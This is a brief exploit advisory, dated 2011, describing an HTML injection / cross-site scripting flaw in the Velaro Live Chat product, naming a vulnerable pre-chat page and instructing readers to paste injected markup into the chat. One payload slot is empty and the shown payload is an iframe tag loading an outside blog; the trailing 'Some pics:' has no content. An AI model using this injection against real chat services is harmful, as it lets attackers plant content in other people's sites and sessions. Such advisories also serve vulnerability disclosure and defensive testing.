Velaro Live Chat HTML Injection

# Exploit Title: Velaro Live Chat Software Cross Site Scripting
# Date: 29.08.2011
# Author: Sony
# Software Link: http://www.velaro.com/features/live-chat
# Version: all version
# POC: http://st2tea.blogspot.com/2011/08/velaro-live-chat-software-cross-site.html

..................................................................

This is Html Code Injection in the Velaro Live Chat Software:

http://www.velaro.com/Portals/0/prechat-choose.html

Put our code in the chat:



or

< iframe src="http://st2tea.blogspot.com/" >

Some pics: